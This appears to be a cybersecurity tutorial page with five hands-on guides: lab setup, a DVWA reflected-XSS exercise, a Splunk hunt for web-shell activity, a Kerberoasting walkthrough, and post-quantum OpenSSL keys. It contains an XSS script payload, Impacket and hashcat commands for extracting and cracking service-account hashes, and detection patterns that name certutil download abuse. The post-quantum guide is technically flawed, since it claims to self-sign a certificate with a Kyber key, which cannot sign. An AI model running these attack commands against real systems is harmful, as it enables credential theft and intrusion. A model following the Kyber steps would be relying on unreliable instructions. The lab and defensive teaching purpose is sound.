Penetration Testing OWASP Top 10 Kali Linux CompTIA Security+ Quantum Cryptography SOC Analyst
Step-By-Step Guides

Cybersecurity Tutorials

Hands-on, walk-through tutorials with precise steps, command snippets, and difficulty levels. Follow along and build real-world security skills.

5 Comprehensive Guides
Code Blocks Included
100% Free Lab Setup
Advertisement
Beginner

Setting Up Your Kali Linux & Virtual Hacking Lab

Learn how to configure an isolated, safe virtualized environment to practice offensive hacking safely and legally.

🛠️ Requirements & Tools: VirtualBox 7.0+ Kali Linux Installer ISO Metasploitable 2 VM Minimum 8GB RAM
1

Install VirtualBox and Extensions

Download and run the VirtualBox installer for your OS. Be sure to also download and install the **VirtualBox Extension Pack** to enable full USB device and network interface driver capabilities.

2

Create the Kali Linux Virtual Machine

Open VirtualBox, click **New**, and specify the following configurations:

  • Name: Kali-Pentester
  • Type: Linux, **Version:** Debian (64-bit)
  • Base Memory: 4096MB (4GB)
  • Processors: 2 vCPUs
  • Virtual Disk: Create a virtual hard disk (VDI) of 30GB (dynamically allocated)

In **Settings** > **Storage**, attach your Kali Linux ISO to the Virtual Optical Drive, then launch the VM and proceed with the standard graphic installation.

3

Configure the Host-Only/NAT Network

To keep your hacking lab safely isolated from your main home network while allowing internet access inside VMs for updates, configure two network adapters in both VMs:

  • Adapter 1: NAT (For internet connection to update tools)
  • Adapter 2: Host-Only Adapter (e.g., `vboxnet0` - For safe, isolated VM-to-VM interaction)
4

Import and Launch Metasploitable 2

Download the Metasploitable2 ZIP, extract it, and import the `.vmdk` file into VirtualBox as a new Linux virtual machine. In **Settings** > **Network**, attach it **only** to the Host-Only Adapter (Adapter 2) so it remains inaccessible from the internet due to its intentional extreme vulnerability.

Run both VMs and verify communication by running a ping from Kali to Metasploitable:

ping -c 4 <metasploitable_host_only_ip>
Advertisement
Beginner

Finding and Exploiting Your First Cross-Site Scripting (XSS)

A deep dive into intercepting HTTP requests, discovering reflective XSS entry points, and executing basic scripts.

🛠️ Requirements & Tools: Burp Suite Community DVWA Hacking Lab Firefox Browser
1

Configure Burp Suite Interceptor Proxy

Launch Burp Suite, click **Temporary Project** > **Use Burp Defaults**, and head to the **Proxy** tab. Ensure intercept is turned **ON**. Open the built-in Burp Browser or configure your Firefox proxy extensions (like FoxyProxy) to point to `127.0.0.1:8080` so all web requests flow through Burp.

2

Locate Reflected XSS Page

Navigate to your DVWA login page inside your lab. Log in with credentials `admin` / `password`. In the sidebar, set **DVWA Security Level** to **Low**, then select **Reflected XSS** from the vulnerabilities list.

3

Input Injection and Trace Reflection

In the input field where it asks "What is your name?", input a harmless string like `vexorion-testing` and click Submit. Inside Burp Suite, click **Forward** to release the request, or locate the request under **Proxy** > **HTTP History**.

Examine the raw response. Search for `vexorion-testing` in the page response HTML to check if the input is directly reflected inside the `

` tag without sanitization or HTML encoding.

4

Inject & Trigger Payload

Since the reflection is raw, input the following basic Javascript payload into the name box:

<script>alert('XSS Exploit Successful by Vexorion Learn')</script>

Click **Submit**. The browser will immediately interpret the raw reflection as code, prompting a popup box displaying your message. You have successfully executed a client-side attack!

Intermediate

Threat Hunting with Splunk: Catching Suspicious Processes

Build real-world Blue Team skills by querying Windows Sysmon events to detect active reverse shell attempts.

🛠️ Requirements & Tools: Splunk Enterprise Windows Sysmon Kali Linux (Attacker)
1

Configure Sysmon on Windows Target

Download Sysmon from Microsoft Sysinternals. Save it and install it with a highly regarded security configuration profile like SwiftOnSecurity's template:

sysmon.exe -i sysmonconfig-export.xml

This configures Windows Event Logging to capture process creations (Event ID 1) and network connections (Event ID 3) in detail.

2

Injest Events into Splunk

Install Splunk Forwarder on the Windows target or upload the Windows Event Log files (`Microsoft-Windows-Sysmon/Operational`) directly into your Splunk indexer under SourceType: `XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`.

3

Write the SPL Hunt Query

A classic attacker footprint is executing Command Prompt or PowerShell silently from unusual parent processes (like Microsoft Word or Web Server processes). In Splunk Search, run this SPL query:

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| search ParentImage IN ("*\\w3wp.exe", "*\\httpd.exe", "*\\nginx.exe", "*\\winword.exe", "*\\excel.exe") 
| search Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\powershell_ise.exe")
| table _time Host ParentImage Image CommandLine
4

Analyze the Results

Review the returned table. If a web service (`w3wp.exe`) spawned a command-line interpreter (`cmd.exe`) containing commands like `whoami` or `certutil -urlcache -f`, you have caught a live exploit/web shell execution attempt. Standard alert rules can now be generated from this search.

Advanced

Active Directory Kerberoasting Attack Walkthrough

Learn how to exploit Kerberos ticket architecture to extract service account password hashes offline.

🛠️ Requirements & Tools: Kali Linux VM Impacket Suite Hashcat Active Directory Domain access
1

Understanding the Attack Vector

Kerberoasting targets Active Directory accounts that have a registered Service Principal Name (SPN). Any authenticated domain user can request a Kerberos service ticket (TGS) for any service. The ticket is encrypted with the service account's password hash. We can extract this ticket and crack the password hash offline.

2

Query AD & Request Service Tickets

Using a standard domain credential, run Impacket's `GetUserSPNs.py` script from Kali Linux. This tool queries LDAP for accounts with SPNs and automatically requests the TGS tickets:

python3 GetUserSPNs.py -request -dc-ip 192.168.1.100 corp.local/domain_user:password123 -outputfile kerb_hashes.txt

This saves the encrypted service tickets in a format that Hashcat can parse.

3

Setup Offsite Brute-Force Cracking

Move the `kerb_hashes.txt` file to your GPU cracking rig or launch Hashcat locally. Run Hashcat targeting mode **13100** (Kerberos 5, TGS-REP etype 23) using a robust dictionary like `rockyou.txt`:

hashcat -m 13100 -a 0 kerb_hashes.txt /usr/share/wordlists/rockyou.txt
4

Remediation Strategies

To defend against Kerberoasting: 1. Ensure all service accounts have complex, randomized passwords of 25+ characters, 2. Transition critical services to Group Managed Service Accounts (gMSA) which rotate passwords automatically, 3. Monitor Event Logs for high volumes of TGS requests with RC4 encryption (Event ID 4769).

Advanced

Migrating to Post-Quantum SSL Certificates (CRYSTALS-Kyber)

Be future-ready. Compile OpenSSL with quantum-safe provider libraries and generate Kyber cryptographic keys.

🛠️ Requirements & Tools: Ubuntu 22.04+ VM liboqs Library OpenSSL 3.x OQS Provider CMake & GCC Compiler
1

Build liboqs (Open Quantum Safe Library)

Clone and build `liboqs` which contains the C implementations of NIST post-quantum cryptographic algorithms:

git clone https://github.com/open-quantum-safe/liboqs.git
cd liboqs && mkdir build && cd build
cmake -DBUILD_SHARED_LIBS=ON -DCMAKE_INSTALL_PREFIX=/usr/local ..
make -j$(nproc)
sudo make install
2

Compile OQS OpenSSL Provider

To hook up these quantum algorithms to OpenSSL, clone and build the `oqs-provider`:

git clone https://github.com/open-quantum-safe/oqs-provider.git
cd oqs-provider && mkdir build && cd build
cmake -DOPENSSL_ROOT_DIR=/usr -DCMAKE_INSTALL_PREFIX=/usr/local ..
make
sudo make install
3

Verify OpenSSL Post-Quantum Providers

Edit `/etc/ssl/openssl.cnf` or specify custom configuration loading the `oqsprovider`. Test the system by querying available quantum-safe algorithms:

openssl list -signature-algorithms -provider oqsprovider
openssl list -kem-algorithms -provider oqsprovider

You should see **kyber512**, **kyber768**, **kyber1024** and **dilithium** algorithms successfully listed.

4

Generate PQC Kyber Keypair & Certificate

Generate a post-quantum public/private keypair using **Kyber-768** (NIST's primary recommended standard) and create a self-signed post-quantum SSL certificate:

# Generate Kyber-768 key
openssl genpkey -algorithm kyber768 -out kyber768_priv.key

# Create CSR & self-signed certificate valid for 365 days
openssl req -new -x509 -key kyber768_priv.key -out pq_cert.crt -days 365 -subj "/CN=pqc-test.vexorion.com"

Congratulations! You have generated a certificate secure against future quantum computers.